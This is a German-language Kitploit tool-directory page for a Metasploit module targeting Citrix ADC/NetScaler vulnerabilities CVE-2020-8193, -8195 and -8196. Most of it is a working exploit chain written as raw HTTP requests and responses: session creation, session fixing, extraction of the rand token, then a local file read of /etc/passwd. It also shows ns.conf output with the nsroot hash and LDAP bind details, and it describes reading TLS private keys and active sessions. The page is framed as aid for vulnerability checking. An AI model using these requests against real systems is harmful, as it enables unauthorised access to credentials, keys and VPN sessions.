Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
citrix_adc_netscaler_lfi — Dieses Metasploit-Framework-Modul kann verwendet werden, um Unternehmen bei der Überprüfung der letzten Citrix-Sicherheitslücken CVE-2020-8193, CVE-2020-8195 und CVE-2020-8196 (offengelegt am 08. Juli 2020) zu helfen. | Kitploit
Tools/GitHubGitHub/zeop-cybersec/citrix_adc_netscaler_lfi
Exploit-FrameworksSchwachstellenanalyseWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsRed Teaming
GitHubzeop-cybersec/citrix_adc_netscaler_lfi

citrix_adc_netscaler_lfi

Dieses Metasploit-Framework-Modul kann verwendet werden, um Unternehmen bei der Überprüfung der letzten Citrix-Sicherheitslücken CVE-2020-8193, CVE-2020-8195 und CVE-2020-8196 (offengelegt am 08. Juli 2020) zu helfen.

Repository anzeigen
643vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

citrix_adc_netscaler_lfi_scan

Citrix-Banner

Dieses Metasploit-Framework-Modul kann verwendet werden, um Unternehmen bei der Überprüfung der letzten Citrix-Sicherheitslücken (veröffentlicht am 8. Juli 2020) zu helfen.

  • CVE-2020-8193
  • CVE-2020-8195
  • CVE-2020-8196

Öffentliche Berichterstattung am 8. Juli 2020 durch Donny Maasland diskutierte wie die Sicherheitslücke ausgenutzt werden könnte.

Ab dem 10. Juli hat RIFT bestätigt, dass diese Sicherheitslücke verwendet werden kann, um gültige VPN-Sitzungen aus einer anfälligen Instanz zu extrahieren.

Weitere Informationen auf Twitter:

  • Citrix veröffentlicht kritische Patches für 11 neue Schwachstellen, die mehrere Produkte betreffen
  • Hacker scannen aktiv und versuchen ständig, Citrix-ADC-Sicherheitslücken auszunutzen

Anfragen

0x1 create_session (Einleiten)

Zuerst müssen Sie die Sitzungs-ID abrufen.

root@kitploit:~
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
X-NITRO-USER: LCGSfX
X-NITRO-PASS: fYiZon
Content-Type: application/xml
Content-Length: 44
Connection: close

<appfwprofile><login></login></appfwprofile>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:23 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Set-Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

0x2 fix_session_rand

Dann müssen Sie die Sitzung reparieren. Sie können diesen Schritt nutzen, um den rand-Wert zu erhalten (und sich eine zusätzliche Anfrage an /menu/stc zu sparen).

root@kitploit:~
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
Content-Type: application/x-www-form-urlencoded
Connection: close
root@kitploit:~
HTTP/1.1 302 Found
Date: Tue, 14 Jul 2020 09:13:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=0; expires=Fri, 09-Jul-2021 09:13:27 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
X-XSS-Protection: 1; mode=block
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Sie müssen der Weiterleitung folgen.

root@kitploit:~
GET /menu/neo HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
Content-Type: application/x-www-form-urlencoded
Connection: close

Und holen Sie sich den rand-Wert aus der Antwortbody.

root@kitploit:~
HTTP/1.1 200 OK
Date: Tue, 14 Jul 2020 09:13:30 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: startupapp=neo; expires=Fri, 09-Jul-2021 09:13:30 GMT; Max-Age=31104000; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Length: 1590
Connection: close
Content-Type: text/html;application/octet-stream;application/ecmascript;application/json;application/xml;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XDEV_HTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Configuration</title>
<script type="text/javascript">var neo_logout_url = "/menu/lo?rand=478257144.1894793017920341";</script>
<script type="text/javascript">var neo_machine_sysid = "450092";var rand = "478257144.1894793017920341";var partition_dir = "";var is_ha_supported_in_gui = "true";var login_warning = "";</script>
<script type="text/javascript">var global_data = "{global_data}";</script>
<link href="/admin_ui/rdx/core/css/rdx.css" rel="stylesheet" type="text/css"/>
<link href="/admin_ui/neo/css/neo.css" rel="stylesheet" type="text/css"/>
<!--[if IE]> <style type="text/css"> .form td input[type="submit"] { width: 50px; } </style> <![endif]-->
<script type="text/javascript" src="/admin_ui/rdx/core/js/rdx.js"></script>
<script type="text/javascript" src="/menu/branding"></script>
<script type="text/javascript" src="/menu/neoglobaldata"></script>
<script type="text/javascript" src="/menu/neoa?gui_token=478257144.1894793017920341"></script>
<script type="text/javascript" src="/admin_ui/neo/js/neo.js"></script>
<script type="text/javascript" src="/admin_ui/neo/js/epa_expression_data_win.js"></script>
<script type="text/javascript" src="/admin_ui/neo/js/epa_expression_data_mac.js"></script>
</head>
<body class="ns_body">
</body>
</html>

0x3 create_session (Unterbrechen)

root@kitploit:~
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
X-NITRO-USER: PjdFbLCc
X-NITRO-PASS: xyFoLmXD
Content-Type: application/xml
Content-Length: 44
Connection: close

<appfwprofile><login></login></appfwprofile>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

0x4 read_lfi

root@kitploit:~
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
X-NITRO-USER: UGjkHm
X-NITRO-PASS: NbIEBHxw
rand_key: 478257144.1894793017920341
Content-Type: application/xml
Content-Length: 31
Connection: close

<clipermission></clipermission>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:37 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="passwd"
Accept-Ranges: bytes
Content-Length: 465
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/octet-stream

root:*:0:0:Charlie &:/root:/usr/bin/bash
nsroot:*:0:0:Netscaler Root:/root:/netscaler/nssh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsmonitor:*:65532:65534:Netscaler Monitoring user:/var/nstmp/monitors:/usr/sbin/nologin

Exploit-Entwicklung und Auswirkungen

Ein Angreifer kann diese Sicherheitslücke ausnutzen, um sensible Informationen auf anfälligen Citrix-Systemen zu erlangen.

Eine kleine Übersicht darüber, was wir auf einem Citrix Netscaler 12.1 build 55.18 beobachtet haben.

  • Möglichkeit, /nsconfig/ns.conf zu lesen:

Dies ist die Konfigurationsdatei für den Netscaler. Sie enthält die Hashes der Benutzer, die berechtigt sind, sich per SSH mit dem Netscaler zu verbinden (einschließlich des Benutzers nsroot).

Diese Datei enthält auch andere Informationen, wie die für die Bindung an ein Active Directory (zum Beispiel).

Einige interessante Ausgaben:

root@kitploit:~
set system user nsroot 35b7a39540c7f42a4c85455a750fed309e506d6d83fcaae83 -encrypted -hashmethod SHA1
add authentication ldapAction 192.168.7.3_LDAP -serverIP 192.168.7.3 -serverPort 636 -ldapBase "DC=prod,DC=contoso,DC=com" -ldapBindDn [email protected] -ldapBindDnPassword 36e2fd1867ca398c68f45c7c54dfa56988c3464ff2a3acf48887091292fb58f5 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName
add ssl certKey ns-server-certificate -cert ns-server.cert -key ns-server.key

Ns.conf-Darstellung

  • Möglichkeit, /nsconfig/ssl/ns-server.key (und alle anderen Zertifikatsdateien) zu lesen:

Es ist der Zertifikatsschlüssel für TLS.

Privater TLS-Schlüssel

  • Fähigkeit, das Verzeichnis /var/nstmp aufzulisten:

Es ist im Allgemeinen nicht üblich, Verzeichnisse über einen LFI aufzulisten. Ein Angreifer kann dies nutzen, um sich im Dateisystem zurechtzufinden. Das Verzeichnis /var/nstmp enthält die Liste der aktiven Sitzungen.

Aktive Sitzungen

Anfällige Systeme

CVE-2020-8193: Eine falsche Zugriffskontrolle in Citrix ADC und Citrix Gateway Versionen vor 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 und 10.5-70.18 sowie Citrix SDWAN WAN-OP Versionen vor 11.1.1a, 11.0.3d und 10.2.7 ermöglicht nicht authentifizierten Zugriff auf bestimmte URL-Endpunkte.

CVSS 3.x Schweregrad und Metriken:

  • Basiswert: 6.5 (MITTEL)
  • Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVE-2020-8195: Falsche Eingabevalidierung in Citrix ADC und Citrix Gateway Versionen vor 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 und 10.5-70.18 sowie Citrix SDWAN WAN-OP Versionen vor 11.1.1a, 11.0.3d und 10.2.7 führt zu begrenzter Offenlegung von Informationen für Benutzer mit niedrigen Privilegien.

CVSS 3.x Schweregrad und Metriken:

  • Basiswert: 6.5 (MITTEL)
  • Vektor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE-2020-8196: Falsche Zugriffskontrolle in Citrix ADC und Citrix Gateway Versionen vor 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 und 10.5-70.18 sowie Citrix SDWAN WAN-OP Versionen vor 11.1.1a, 11.0.3d und 10.2.7 führt zu begrenzter Offenlegung von Informationen für Benutzer mit niedrigen Privilegien.

CVSS 3.x Schweregrad und Metriken:

  • Basiswert: 4.3 (MITTEL)
  • Vektor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Tool herunterladen